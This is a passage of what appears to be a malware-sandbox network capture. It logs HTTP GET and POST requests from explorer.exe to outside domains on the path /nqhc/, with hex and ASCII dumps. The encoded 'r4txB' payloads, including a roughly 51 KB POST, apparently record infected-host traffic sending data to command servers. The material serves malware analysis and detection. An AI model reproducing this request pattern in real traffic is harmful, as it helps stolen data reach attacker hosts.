                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 31 33 20 52 65 71 75 65 73 74 20 45 6e 74 69 74 79 20 54 6f 6f 20 4c 61 72 67 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 31 33 20 52 65 71 75 65 73 74 20 45 6e 74 69 74 79 20 54 6f 6f 20 4c 61 72 67 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                    Data Ascii: <html><head><title>413 Request Entity Too Large</title></head><body bgcolor="white"><center><h1>413 Request Entity Too Large</h1></center><hr><center>openresty/1.13.6.1</center></body></html>
                                                                                                                                                                                    Nov 21, 2022 19:25:34.509573936 CET2129OUTData Raw: 4b 42 57 4f 42 72 57 38 64 70 7a 75 37 78 53 35 53 48 6e 50 64 57 53 41 33 68 74 34 51 33 76 67 6b 62 49 56 77 72 35 4e 6c 69 71 7e 70 75 2d 28 35 52 72 5a 4b 4b 58 34 74 50 39 7a 58 69 2d 79 75 4c 75 74 79 4b 6b 71 43 49 78 44 66 4a 68 64 44 4f
                                                                                                                                                                                    Data Ascii: KBWOBrW8dpzu7xS5SHnPdWSA3ht4Q3vgkbIVwr5Nliq~pu-(5RrZKKX4tP9zXi-yuLutyKkqCIxDfJhdDOkCm03tjMEe8Rs0dPnFvqgcnqA0ZRziEk5cZQQgz2MqtBZu79dfBllRTBZfTLc7u4dzw38mOnRIbxmMeB5hKVxAKiNTAqnOeEPSOEvf8o2f2WKb3BG5ppNQqXbeofS69mz8je0VO8LixGhYkWIaiXXhC7nq0etawWt


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    91192.168.11.204991745.33.23.18380C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:25:36.398196936 CET2142OUTGET /nqhc/?b6=1b9p&r4txB=LdV+lgJdmfuEMP3jUfrE9r0MLHENHMoAvR3n1HnrztGZNsUQ943e3pzfBc8//iPa0aHj65ptHNl5my2qaj9ZRSJvwgLgjYR0TA== HTTP/1.1
                                                                                                                                                                                    Host: www.labour-office.com
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    Nov 21, 2022 19:25:36.533879042 CET2142INHTTP/1.1 404 Not Found
                                                                                                                                                                                    server: openresty/1.13.6.1
                                                                                                                                                                                    date: Mon, 21 Nov 2022 18:25:36 GMT
                                                                                                                                                                                    content-type: text/html
                                                                                                                                                                                    content-length: 175
                                                                                                                                                                                    connection: close
                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty/1.13.6.1</center></body></html>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    92192.168.11.2049919217.160.0.180C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:25:41.590118885 CET2150OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.codemars.academy
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 187
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.codemars.academy
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.codemars.academy/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 4b 55 38 45 4c 4c 28 66 4d 62 64 6b 39 65 41 58 75 50 67 76 4d 51 77 6e 69 73 65 41 6c 53 4f 4a 55 37 48 77 30 67 78 46 34 4b 31 56 35 35 39 42 70 66 50 62 58 4c 65 34 4f 30 48 41 66 54 53 42 38 6b 76 52 58 79 62 49 33 34 33 4a 4a 56 58 73 51 48 62 4e 4b 6e 31 43 77 6e 74 59 35 42 64 32 4d 58 45 6f 53 31 31 52 57 73 71 50 76 35 53 5a 54 41 57 70 34 6e 43 5f 62 39 38 48 79 48 48 41 6f 56 58 62 32 71 5a 6c 44 74 50 52 4c 56 59 5f 42 59 75 6c 53 42 64 68 48 48 48 75 50 76 55 62 57 39 56 74 67 33 67 71 71 51 67 53 77 78 45 77 56 67 29 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: r4txB=KU8ELL(fMbdk9eAXuPgvMQwniseAlSOJU7Hw0gxF4K1V559BpfPbXLe4O0HAfTSB8kvRXybI343JJVXsQHbNKn1CwntY5Bd2MXEoS11RWsqPv5SZTAWp4nC_b98HyHHAoVXb2qZlDtPRLVY_BYulSBdhHHHuPvUbW9Vtg3gqqQgSwxEwVg).
                                                                                                                                                                                    Nov 21, 2022 19:25:41.610172033 CET2151INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:25:41 GMT
                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                    Data Raw: 31 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 52 4b 8f d3 30 10 be f7 57 0c 41 a2 17 12 b7 74 0f 7d 24 7b a0 ad c4 4a 65 59 41 78 1d 8d 33 6d 2c 39 b6 6b 8f fb d8 5f 8f 93 6e 0a 8b 56 9c 3c b6 be d7 78 26 7f b5 fa b4 2c 7f 3e ac a1 a6 46 c1 c3 d7 f7 9b bb 25 24 29 63 df 27 4b c6 56 e5 0a 7e 7c 28 3f 6e 60 9c 8d a0 74 5c 7b 49 d2 68 ae 18 5b df 27 83 a4 26 b2 73 c6 8e c7 63 76 9c 64 c6 ed 58 f9 99 9d 5a ad 71 4b 7e 2a 53 fa 8b 99 55 54 25 b7 83 bc 33 54 5c ef 8a 04 75 02 a7 46 cd 9f dd b4 2f 5e 90 1f cf 66 b3 8b 6a d4 80 bc 46 5e c5 13 72 92 a4 b0 ad 60 ed 9c 71 70 33 ba 81 14 ee 0d c1 d6 04 5d b5 10 76 c5 e4 0d 12 07 61 34 a1 a6 22 21 3c 11 6b e3 2c 40 d4 dc 79 a4 22 d0 36 9d 26 f1 53 c8 a6 b8 0f f2 50 24 cb 0b 3c 2d cf 16 5b 6f f8 47 45 9b 54 70 51 e3 73 56 f7 94 b6 56 ce a8 2e 32 7b ca 9c ff 32 d5 19 3c 9d 15 16 c9 36 02 d2 2d 6f a4 3a cf b9 93 5c 2d 2e 16 f5 b8 47 08 a3 8c 9b bf 1e f1 c9 bb a9 58 74 78 2f 1f 71 1e 07 83 cd 05 fd 9f d6 eb 71 97 d8 f6 6a 7f f8 a3 6c 7a e5 6f 10 b6 52 d4 12 1d b8 b6 6b 0f 7a c8 c1 72 0f 6f 90 8b 40 b8 a0 be 80 d8 4f 38 f4 b7 6c 70 a7 c0 62 20 f0 43 be 93 0e aa 61 d0 08 e8 1c 06 07 84 a2 d6 72 1f 30 83 6f 18 a4 52 f8 08 ae a7 a2 f7 fc 1c 0d 83 ba 6a 3b 19 59 d8 c4 d9 64 f0 45 c2 c1 84 18 04 c1 46 c3 c8 6c e3 70 21 7a 7e 15 b9 3c 5c 73 73 1b 95 77 8e 1f 70 e1 c1 aa e0 5b 2d 1f 23 68 e2 24 0f e8 df 82 40 c5 c1 cb 9d 96 5b 89 b0 0f 43 a9 80 bf d0 a1 0f d6 3a d9 f4 46 59 b7 43 36 fe 63 ce da d1 c5 15 ee 96 e6 76 f0 1b 11 e8 b3 c9 45 03 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 1ee}RK0WAt}${JeYAx3m,9k_nV<x&,>F%$)c'KV~|(?n`t\{Ih['&scvdXZqK~*SUT%3T\uF/^fjF^r`qp3]va4"!<k,@y"6&SP$<-[oGETpQsVV.2{2<6-o:\-.GXtx/qqjlzoRkzro@O8lpb Car0oRj;YdEFlp!z~<\sswp[-#h$@[C:FYC6cvE0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    93192.168.11.2049920217.160.0.180C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:25:43.623673916 CET2152OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.codemars.academy
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 527
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.codemars.academy
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.codemars.academy/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 4b 55 38 45 4c 4c 28 66 4d 62 64 6b 39 2d 51 58 69 49 55 76 4c 77 77 67 7e 63 65 41 77 43 4f 4e 55 37 4c 77 30 6c 42 73 34 38 6c 56 35 5a 74 42 6f 64 6e 62 55 4c 65 34 41 55 48 50 63 6a 53 77 38 6b 6a 5a 58 79 6e 49 33 34 6a 4a 50 6e 50 73 59 58 62 4f 42 48 31 42 67 48 74 49 39 42 64 38 4d 58 49 46 53 30 68 52 57 64 47 50 75 37 71 5a 58 52 57 71 79 6e 44 36 64 39 38 45 34 6e 48 4b 6f 56 72 6c 32 6f 4a 66 43 63 72 52 49 31 34 5f 41 59 75 69 49 42 64 69 4f 6e 47 74 4a 64 42 4a 62 63 74 67 28 56 77 72 79 6a 39 48 34 77 35 49 56 30 5a 70 78 69 33 6b 6a 77 43 7a 43 6d 28 65 52 59 63 54 64 6f 67 35 6b 4e 4f 36 56 73 43 32 6d 58 49 51 51 74 57 53 6c 52 4b 73 68 4d 4f 4f 51 76 7e 46 4d 78 38 4c 4b 64 46 57 66 5f 53 78 31 31 59 4c 58 4d 63 77 42 74 47 5f 57 56 6c 58 28 63 47 76 36 43 66 6f 6a 51 35 6b 30 63 45 35 4e 45 46 58 6b 68 72 46 6d 52 39 39 79 4e 47 64 35 73 74 45 4c 65 39 63 41 5f 32 64 51 4b 58 32 34 34 52 49 72 66 69 47 66 4f 70 58 67 6a 70 6c 33 6f 61 55 56 65 31 74 76 58 43 37 79 58 30 6d 46 6b 38 4b 7a 77 31 62 53 72 5a 79 6f 49 79 4c 39 44 48 5a 58 62 4d 72 4d 50 59 52 4b 66 32 56 34 4e 48 4a 6b 69 41 70 73 48 6d 78 53 74 7e 47 7a 30 4c 64 4b 4c 4a 36 61 76 58 64 71 71 6f 72 31 30 7a 48 6d 79 72 77 6f 70 72 50 47 6b 77 39 58 4c 61 6c 74 4e 69 6e 32 79 64 47 34 61 38 78 54 45 68 53 52 56 79 46 77 5f 68 78 57 6b 4a 41 67 4c 65 55 30 78 73 63 39 35 71 72 61 44 69 4a 69 38 35 4c 7a 2d 67 66 34 35 62 68 6a 6a 57 58 30 6d 49 32 66 48 67 6c 77 72 57 6f 44 55 50 74 28 34 32 48 4c 5f 34 45 59 35 46 64 73 4f 32 74 6b 48 6b 69 63 37 63 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: r4txB=KU8ELL(fMbdk9-QXiIUvLwwg~ceAwCONU7Lw0lBs48lV5ZtBodnbULe4AUHPcjSw8kjZXynI34jJPnPsYXbOBH1BgHtI9Bd8MXIFS0hRWdGPu7qZXRWqynD6d98E4nHKoVrl2oJfCcrRI14_AYuiIBdiOnGtJdBJbctg(Vwryj9H4w5IV0Zpxi3kjwCzCm(eRYcTdog5kNO6VsC2mXIQQtWSlRKshMOOQv~FMx8LKdFWf_Sx11YLXMcwBtG_WVlX(cGv6CfojQ5k0cE5NEFXkhrFmR99yNGd5stELe9cA_2dQKX244RIrfiGfOpXgjpl3oaUVe1tvXC7yX0mFk8Kzw1bSrZyoIyL9DHZXbMrMPYRKf2V4NHJkiApsHmxSt~Gz0LdKLJ6avXdqqor10zHmyrwoprPGkw9XLaltNin2ydG4a8xTEhSRVyFw_hxWkJAgLeU0xsc95qraDiJi85Lz-gf45bhjjWX0mI2fHglwrWoDUPt(42HL_4EY5FdsO2tkHkic7c.
                                                                                                                                                                                    Nov 21, 2022 19:25:43.642837048 CET2153INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:25:43 GMT
                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                    Data Raw: 31 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 52 4b 8f d3 30 10 be f7 57 0c 41 a2 17 12 b7 74 0f 7d 24 7b a0 ad c4 4a 65 59 41 78 1d 8d 33 6d 2c 39 b6 6b 8f fb d8 5f 8f 93 6e 0a 8b 56 9c 3c b6 be d7 78 26 7f b5 fa b4 2c 7f 3e ac a1 a6 46 c1 c3 d7 f7 9b bb 25 24 29 63 df 27 4b c6 56 e5 0a 7e 7c 28 3f 6e 60 9c 8d a0 74 5c 7b 49 d2 68 ae 18 5b df 27 83 a4 26 b2 73 c6 8e c7 63 76 9c 64 c6 ed 58 f9 99 9d 5a ad 71 4b 7e 2a 53 fa 8b 99 55 54 25 b7 83 bc 33 54 5c ef 8a 04 75 02 a7 46 cd 9f dd b4 2f 5e 90 1f cf 66 b3 8b 6a d4 80 bc 46 5e c5 13 72 92 a4 b0 ad 60 ed 9c 71 70 33 ba 81 14 ee 0d c1 d6 04 5d b5 10 76 c5 e4 0d 12 07 61 34 a1 a6 22 21 3c 11 6b e3 2c 40 d4 dc 79 a4 22 d0 36 9d 26 f1 53 c8 a6 b8 0f f2 50 24 cb 0b 3c 2d cf 16 5b 6f f8 47 45 9b 54 70 51 e3 73 56 f7 94 b6 56 ce a8 2e 32 7b ca 9c ff 32 d5 19 3c 9d 15 16 c9 36 02 d2 2d 6f a4 3a cf b9 93 5c 2d 2e 16 f5 b8 47 08 a3 8c 9b bf 1e f1 c9 bb a9 58 74 78 2f 1f 71 1e 07 83 cd 05 fd 9f d6 eb 71 97 d8 f6 6a 7f f8 a3 6c 7a e5 6f 10 b6 52 d4 12 1d b8 b6 6b 0f 7a c8 c1 72 0f 6f 90 8b 40 b8 a0 be 80 d8 4f 38 f4 b7 6c 70 a7 c0 62 20 f0 43 be 93 0e aa 61 d0 08 e8 1c 06 07 84 a2 d6 72 1f 30 83 6f 18 a4 52 f8 08 ae a7 a2 f7 fc 1c 0d 83 ba 6a 3b 19 59 d8 c4 d9 64 f0 45 c2 c1 84 18 04 c1 46 c3 c8 6c e3 70 21 7a 7e 15 b9 3c 5c 73 73 1b 95 77 8e 1f 70 e1 c1 aa e0 5b 2d 1f 23 68 e2 24 0f e8 df 82 40 c5 c1 cb 9d 96 5b 89 b0 0f 43 a9 80 bf d0 a1 0f d6 3a d9 f4 46 59 b7 43 36 fe 63 ce da d1 c5 15 ee 96 e6 76 f0 1b 11 e8 b3 c9 45 03 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 1ee}RK0WAt}${JeYAx3m,9k_nV<x&,>F%$)c'KV~|(?n`t\{Ih['&scvdXZqK~*SUT%3T\uF/^fjF^r`qp3]va4"!<k,@y"6&SP$<-[oGETpQsVV.2{2<6-o:\-.GXtx/qqjlzoRkzro@O8lpb Car0oRj;YdEFlp!z~<\sswp[-#h$@[C:FYC6cvE0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    94192.168.11.2049921217.160.0.180C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:25:45.653367043 CET2154OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.codemars.academy
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 51815
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.codemars.academy
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.codemars.academy/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 4b 55 38 45 4c 4c 28 66 4d 62 64 6b 39 2d 51 58 69 49 55 76 4c 77 77 67 7e 63 65 41 77 43 4f 4e 55 37 4c 77 30 6c 42 73 34 38 74 56 36 71 56 42 6e 63 6e 62 56 4c 65 34 49 30 48 4d 63 6a 53 74 38 6b 72 6a 58 79 72 59 33 36 62 4a 49 30 48 73 62 6c 6a 4f 45 48 31 45 73 6e 74 5a 35 42 64 6f 4d 58 45 52 53 30 30 6b 57 73 79 50 76 35 69 5a 54 69 4f 70 7e 58 43 5f 64 39 38 59 38 6e 47 31 6f 56 66 31 32 6f 46 66 43 5a 7a 52 4b 44 30 5f 4d 70 75 69 63 68 64 6c 42 48 47 63 41 39 42 77 62 63 35 65 28 56 78 57 79 68 52 48 34 77 5a 49 57 33 78 6f 78 43 33 6b 39 67 43 30 54 57 7a 53 52 63 39 47 64 6f 6b 35 6b 4b 61 36 58 4d 43 32 74 57 49 50 47 39 57 63 33 68 4b 42 33 38 4b 77 51 72 58 32 4d 77 6f 4c 4b 74 42 57 65 49 6d 78 32 55 59 4c 55 73 63 79 50 4e 48 69 64 31 6c 4c 28 63 32 4a 36 43 28 34 6a 51 74 6b 79 39 6b 35 62 52 6c 51 6b 42 72 44 71 78 38 5f 32 4e 4b 42 35 71 4e 59 4c 65 39 4d 41 37 47 64 51 5f 66 32 35 36 70 4a 6f 50 69 4e 4b 65 70 43 37 7a 6c 72 33 6f 47 4d 56 66 4e 39 76 55 75 37 79 33 30 6d 44 47 55 4e 37 41 31 63 4e 37 5a 73 33 59 7a 55 39 44 4c 30 58 65 73 52 4e 5f 45 52 4c 76 47 56 79 39 48 47 68 43 41 6c 6d 6e 6d 33 46 39 7e 47 7a 7a 44 4a 4b 4b 31 36 61 64 48 64 72 64 4d 72 7e 48 72 48 67 79 72 4d 6f 70 72 65 47 6b 73 4f 58 4b 4f 50 74 4d 79 64 32 30 6c 47 37 4f 67 78 53 47 4a 52 42 56 79 45 30 5f 67 7a 59 45 31 62 67 4c 79 63 30 79 55 69 39 71 75 72 5a 48 7e 4a 6d 38 35 49 33 65 67 69 78 5a 61 71 6e 69 71 44 30 6d 55 4d 66 45 39 67 77 70 6d 6f 4a 51 44 7a 72 5a 65 49 49 5a 6b 64 51 64 56 55 75 66 79 37 30 79 4d 75 4e 76 38 50 6f 66 65 53 4b 64 4a 48 53 73 4b 66 68 6c 7e 58 79 36 6d 44 6c 7a 68 71 62 53 32 66 33 73 48 51 51 49 6d 79 36 31 48 73 51 67 6f 72 37 43 71 54 79 76 76 58 4e 79 35 56 69 49 63 33 66 53 37 30 5a 79 54 30 6b 38 76 47 77 30 28 78 39 6d 35 55 49 74 68 55 4e 33 68 73 6d 62 78 45 4b 39 78 70 42 71 42 44 4d 6f 68 7a 66 48 64 31 5a 63 6c 52 72 4e 72 46 57 38 65 4c 62 78 35 38 49 72 44 59 54 30 78 73 50 52 39 38 41 65 73 73 66 6c 64 5a 7e 77 51 61 66 73 36 35 33 4c 55 51 6f 4f 42 50 30 66 6e 4c 34 35 67 68 75 75 52 65 79 70 30 6c 75 45 35 6a 64 49 4f 4c 63 2d 75 69 52 30 55 49 56 7a 28 56 6e 46 47 65 44 65 41 34 4f 61 53 44 4c 5f 57 6f 47 4f 62 30 56 43 74 64 71 39 39 44 32 49 6c 58 6e 41 4a 33 4a 79 6c 59 35 65 75 58 41 6f 7e 2d 61 56 36 73 4d 76 6e 4e 32 44 68 7a 50 6f 7e 47 72 6e 33 78 49 34 51 56 47 33 47 64 6c 66 6e 72 59 51 47 34 4b 73 7e 70 4c 67 47 45 61 64 47 54 69 43 65 73 72 4b 65 79 50 4a 45 42 63 49 4f 56 6a 46 6c 67 62 4b 30 41 4a 59 6a 32 4e 54 78 4e 6b 56 4b 70 53 4d 69 4d 31 58 62 63 66 53 43 4a 71 70 43 44 70 56 6e 4d 7a 73 62 68 68 33
                                                                                                                                                                                    Data Ascii: r4txB=KU8ELL(fMbdk9-QXiIUvLwwg~ceAwCONU7Lw0lBs48tV6qVBncnbVLe4I0HMcjSt8krjXyrY36bJI0HsbljOEH1EsntZ5BdoMXERS00kWsyPv5iZTiOp~XC_d98Y8nG1oVf12oFfCZzRKD0_MpuichdlBHGcA9Bwbc5e(VxWyhRH4wZIW3xoxC3k9gC0TWzSRc9Gdok5kKa6XMC2tWIPG9Wc3hKB38KwQrX2MwoLKtBWeImx2UYLUscyPNHid1lL(c2J6C(4jQtky9k5bRlQkBrDqx8_2NKB5qNYLe9MA7GdQ_f256pJoPiNKepC7zlr3oGMVfN9vUu7y30mDGUN7A1cN7Zs3YzU9DL0XesRN_ERLvGVy9HGhCAlmnm3F9~GzzDJKK16adHdrdMr~HrHgyrMopreGksOXKOPtMyd20lG7OgxSGJRBVyE0_gzYE1bgLyc0yUi9qurZH~Jm85I3egixZaqniqD0mUMfE9gwpmoJQDzrZeIIZkdQdVUufy70yMuNv8PofeSKdJHSsKfhl~Xy6mDlzhqbS2f3sHQQImy61HsQgor7CqTyvvXNy5ViIc3fS70ZyT0k8vGw0(x9m5UIthUN3hsmbxEK9xpBqBDMohzfHd1ZclRrNrFW8eLbx58IrDYT0xsPR98AessfldZ~wQafs653LUQoOBP0fnL45ghuuReyp0luE5jdIOLc-uiR0UIVz(VnFGeDeA4OaSDL_WoGOb0VCtdq99D2IlXnAJ3JylY5euXAo~-aV6sMvnN2DhzPo~Grn3xI4QVG3GdlfnrYQG4Ks~pLgGEadGTiCesrKeyPJEBcIOVjFlgbK0AJYj2NTxNkVKpSMiM1XbcfSCJqpCDpVnMzsbhh3
                                                                                                                                                                                    Nov 21, 2022 19:25:45.653418064 CET2159OUTData Raw: 56 55 57 42 28 46 37 6b 59 4d 67 52 33 39 56 2d 46 6a 4a 64 65 52 68 53 4d 45 54 51 58 56 6f 63 63 71 50 50 4b 41 73 38 31 6e 30 46 65 44 64 42 6e 4d 68 45 42 39 52 61 47 6f 78 44 36 4a 76 4a 78 77 44 63 7e 33 7a 54 64 2d 7e 43 45 52 30 51 50 30
                                                                                                                                                                                    Data Ascii: VUWB(F7kYMgR39V-FjJdeRhSMETQXVoccqPPKAs81n0FeDdBnMhEB9RaGoxD6JvJxwDc~3zTd-~CER0QP0vKNCnz~43TfkZ_(nULnpMHK_zn0GLwShjDyEOvc_Lwd1GF(5EwnOJJmDHuuJtqKofzLqfXZ6ZId7LVyjGfQeIBcUFroLTfX8sWYKaj9FhPNJFtsGwb54Gd8fUzFnOX3LlMbaqw3xAAEIJeiUlMk6~qPVXO1qJ1woZ
                                                                                                                                                                                    Nov 21, 2022 19:25:45.653465986 CET2166OUTData Raw: 6c 76 6a 59 4a 66 68 44 73 62 77 57 36 64 76 64 50 4c 75 50 50 2d 56 57 6f 62 28 63 43 74 71 37 38 39 65 4e 37 32 57 4b 4b 39 7e 37 56 44 41 4a 4d 6e 43 4b 62 59 35 78 38 77 44 36 71 75 71 30 73 4e 48 48 4c 38 31 47 57 50 36 57 52 46 62 50 7a 36
                                                                                                                                                                                    Data Ascii: lvjYJfhDsbwW6dvdPLuPP-VWob(cCtq789eN72WKK9~7VDAJMnCKbY5x8wD6quq0sNHHL81GWP6WRFbPz6isymcKtvXIXcQ4TKFKTCuDRDfOSgC4uTKbY7ECqmaVYXF_mIy86BjBJiUqulcVJ-2Q78b65QjA9c2szrxrG-9MXz(CQbUI(IS-UCRpJD(DeSGpbi0UzbYqx8KaQQC5U1w2oW(CDErbZrTf~vVz5U0chimU(5UXZJC
                                                                                                                                                                                    Nov 21, 2022 19:25:45.667725086 CET2168OUTData Raw: 35 61 35 67 37 52 79 75 42 79 55 62 5a 4d 35 78 48 66 4f 75 35 6b 47 47 75 4a 36 48 77 74 35 5a 44 52 49 62 7a 55 47 74 49 51 4b 53 37 32 46 77 52 6b 53 7a 4c 66 6c 77 77 74 65 65 46 36 49 35 48 65 54 67 45 38 62 4a 79 50 67 46 6c 47 47 39 59 59
                                                                                                                                                                                    Data Ascii: 5a5g7RyuByUbZM5xHfOu5kGGuJ6Hwt5ZDRIbzUGtIQKS72FwRkSzLflwwteeF6I5HeTgE8bJyPgFlGG9YYXiyzIivBd1p2alAbDT(CbuTkxOMzEX6jJsj3UVPe7R~hDl5KHTlEZz(o2CDXeYdODSTHk6PdpsNNyUC9srflW1qLinRhAfgckfgDo8TKOSEqYCJjRf49BoK440ExV1b2sSefjpeLX9dcGY0Z456wxr9QZtaxWrhaG
                                                                                                                                                                                    Nov 21, 2022 19:25:45.667895079 CET2170OUTData Raw: 4f 6c 45 4b 61 79 74 71 64 70 39 35 68 5a 37 4b 76 48 79 76 28 43 68 2d 79 51 41 76 6a 4b 44 4d 75 44 46 71 69 76 52 34 6b 4e 66 6d 75 43 6f 64 46 70 7e 63 58 59 6f 54 31 51 57 73 69 74 33 2d 6e 69 43 51 45 56 61 50 42 57 5a 6f 67 44 7a 67 61 46
                                                                                                                                                                                    Data Ascii: OlEKaytqdp95hZ7KvHyv(Ch-yQAvjKDMuDFqivR4kNfmuCodFp~cXYoT1QWsit3-niCQEVaPBWZogDzgaFbvArRgGHGiE81daLQ9Vobt57gxYrxu0Xdchwb9O6g7JQzK3ksQg-acS3HpRvdKiVsyRx26t3FxU5d_qH56aF6_PbaqmCrtLKH0ven4~LszLPE03PFUJxB_CTvI4jtKrF(TyBqKhKMnjMxPpzCtzaVZwXyZ8ywBN_X
                                                                                                                                                                                    Nov 21, 2022 19:25:45.668035984 CET2176OUTData Raw: 68 79 48 50 50 6c 76 39 41 4c 37 66 69 4d 43 44 37 4a 7e 66 4d 56 6e 48 45 79 32 39 62 36 54 49 32 41 30 7a 56 42 69 58 77 38 6c 71 36 47 69 2d 59 49 4a 72 76 4e 38 58 58 33 6a 31 73 30 39 41 67 7a 6a 53 53 59 7e 46 70 6b 39 47 35 39 43 77 4d 4f
                                                                                                                                                                                    Data Ascii: hyHPPlv9AL7fiMCD7J~fMVnHEy29b6TI2A0zVBiXw8lq6Gi-YIJrvN8XX3j1s09AgzjSSY~Fpk9G59CwMOvIlznP09J6W_q5raTfAjAadbuwSRN39UPu1jRxNBDyp8qjQhNzbUb9kwww(36Q1-00ZeUPeDULMyfwuGJpbAc61KGicTyz8DmJQwE46ux9ogZa3W(ajFBWEPlV0QsrmEmCZuOVRLHPsau6jKDxoVv48vGicuvohl9
                                                                                                                                                                                    Nov 21, 2022 19:25:45.668204069 CET2181OUTData Raw: 45 6b 6a 42 52 43 57 6d 50 44 78 64 28 33 55 37 45 75 56 54 45 58 76 56 52 6c 38 42 42 53 77 37 69 5f 55 63 78 6e 52 64 54 50 39 4f 51 56 31 56 7a 79 39 52 34 4a 7a 77 76 30 70 37 69 39 33 6e 79 38 64 73 43 50 45 69 5a 65 76 74 62 6a 46 44 48 55
